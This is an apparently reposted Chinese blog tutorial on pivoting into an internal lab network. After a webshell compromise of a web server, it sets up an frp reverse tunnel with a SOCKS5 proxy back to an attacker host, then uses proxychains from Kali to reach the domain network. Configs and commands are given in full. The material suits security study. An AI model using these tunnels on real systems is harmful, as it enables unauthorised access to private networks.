内网渗透--frp代理设置与proxychains代理设置

这篇具有很好参考价值的文章主要介绍了内网渗透--frp代理设置与proxychains代理设置。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

标题内网渗透–frp代理设置与proxychains代理设置

内网服务器 内网IP地址 外网IP地址
内网web服务器(windows 7) 192.168.52.143 192.168.213.138
内网域控服务器 192.168.52.138
外网服务器 外网IP地址 外网V8网卡
外网kali 192.168.213.132
外网windows攻击机 192.168.0.137 192.168.213.1

frps服务端配置

修改外网windows11主机上的frps.ini文件为:
frpc代理,网络,服务器,运维,安全,网络安全

[common]
bind_port = 7000                     # 外网监听端口

启动监听:

./frps -c ./frps.ini

frpc代理,网络,服务器,运维,安全,网络安全

frpc客户端配置

将经过修改的windows版本的frp通过蚁剑终端上传到wen服务器上
frpc代理,网络,服务器,运维,安全,网络安全

[common]
server_addr = 192.168.0.137                 # 外网windows地址
server_port = 7000                          # 外网监听端口

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
 
[socks5]                                   # socks5代理设置,kali使用该代理加入战斗
type = tcp
plugin = socks5
remote_port = 5000

frp连接建立

客户端主动启动链接

frpc.exe -c frpc.ini

frpc代理,网络,服务器,运维,安全,网络安全
服务端的外网window11连接成功
frpc代理,网络,服务器,运维,安全,网络安全

kali socks 代理连接

由于刚刚在frpc客户端配置文件中写入了socks5代理,此时我们可以使用kali中的proxychains,设置socks5代理加入网络中
只需修改 /etc/proxychains4.conf 文件的最后一行就可以了
frpc代理,网络,服务器,运维,安全,网络安全

socks5 192.168.213.1 5000        # 192.168.213.1是外网win11的v8网卡地址

这样,我们就可以通过kali和自己的win11主机发动对内网的攻击了文章来源地址https://www.toymoban.com/news/detail-596915.html

到了这里,关于内网渗透--frp代理设置与proxychains代理设置的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • frp内网代理-一层反向代理 实战篇

    假设:目前已获取边界服务器(192.168.0.104)的权限 实现:通过frp做反向代理,实现192.168.0.107外网主机–成功访问内网oa系统–内网192.168.52.30系统 frp下载地址 https://github.com/fatedier/frp/releases 客户端 (client) ubuntu-web1(192.168.0.104) 服务端(client) kali(192.168.0.107) 测试连接 kali本地添

    2023年04月13日
    浏览(31)
  • linux-kali的proxychains4 设置终端及浏览器代理(详细步骤)

    问题背景:         kali版本2024.1,虚拟机版本vmware workstation pro 17, 由于工作中需要使终端和浏览器能科学上网代理,查询资料后发现,常规步骤是使用系统自带的proxychains。 解决步骤: 1.配置虚拟机的网卡适配器:(这里使用的是桥接模式) 2. 打开代理软件的允许局域网

    2024年04月12日
    浏览(70)
  • 内网代理的系列二:frp(socks5)+Proxifier

    环境搭建: 1台Win08虚拟机 1台Win07虚拟机 1台VPS 1台主机 网关设置 Win08虚拟机 关闭防火墙 Win07虚拟机 这种网络场景也是我们日常渗透中最常见的一种 通常我们都是socks5代理 , 实现能够访问内网主机上开放的web站点 https://github.com/fatedier/frp/releases/tag/v0.44.0 VPS: ./frps -c frps.ini

    2024年02月07日
    浏览(25)
  • p70 内网安全-域横向内网漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内网漫游)

    数据来源         本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。   ​ 必要基础知识点: 内外网简单知识 内网 1 和内网 2 通信问题 正向反向协议通信连接问题 内网穿透代理隧道

    2024年02月05日
    浏览(34)
  • frp内网穿透(windows和服务器)

     1.frp下载 https://github.com/fatedier/frp/releases  windows端可以下载windows版本,服务器和客户端尽量保持版本一致,当前最新版本为0.43.0. 2.外网服务器frp服务端配置    2.1  使用    命令创建一个新的文件夹frp,然后在文件夹下使用命令:   2.2 解压,并进入解压文件夹   2 .3 删掉

    2024年02月05日
    浏览(48)
  • 虚拟机服务器搭建+FRP内网穿透

    一、虚拟机安装         这里安装的是vmware workstation 17 pro和CentOS-7-x86_64-DVD-2009镜像文件  centos虚拟机服务器手把手搭建_虚拟机搭建服务器_无名之辈之码谷娃的博客-CSDN博客  这篇文章对虚拟机搭建讲的还是比较详细。 完成后,需要为用户添加sudo权限,不然你创建的用户是

    2024年01月20日
    浏览(43)
  • frp实现内网穿透(内网服务器到公网访问的方案)

    目录 背景: 一、frp的简介 二、Frp Server的配置 三.Frp Client的配置 我使用python写了一个http后端,如代码所示,ip为10.1.136.73,port为8000,现在需要把http后端在公网可以被使用。一个较简单的方案是通过frp实现内网穿透。 这里我已有一个公网ip使用winserver的服务器,但配置太低部

    2024年02月09日
    浏览(37)
  • 利用frp搭建自己的内网穿透服务器

    本教程基于以下环境完成 带有公网IP的云服务器一台,安装centos7.6系统 一个属于自己的域名,可以是二级域名 域名对应的证书文件 一台64位Windows系统的电脑 开源项目frp 证书文件主要是用来配置https访问的,如果没有证书文件可以参考我的这篇文章生成 centos7中申请Let‘s E

    2024年02月02日
    浏览(48)
  • 我的内网渗透-代理转发(2)

    目录 ssh telnet与SSH的区别 安装环境 常用参数 本地端口转发 远程端口转发 动态端口转发 Socks 使用方法 msf端口转发 常用参数 使用方法 创建监听 MSF读取文件命令(开启msf的时候直接读取文件就自动设置好监听的各种配置) 获取会话后  earthworm 常用参数 代理工具 正向和反向

    2024年02月11日
    浏览(27)
  • 内网渗透之端口转发、映射、代理

    端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH)为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端

    2024年02月08日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包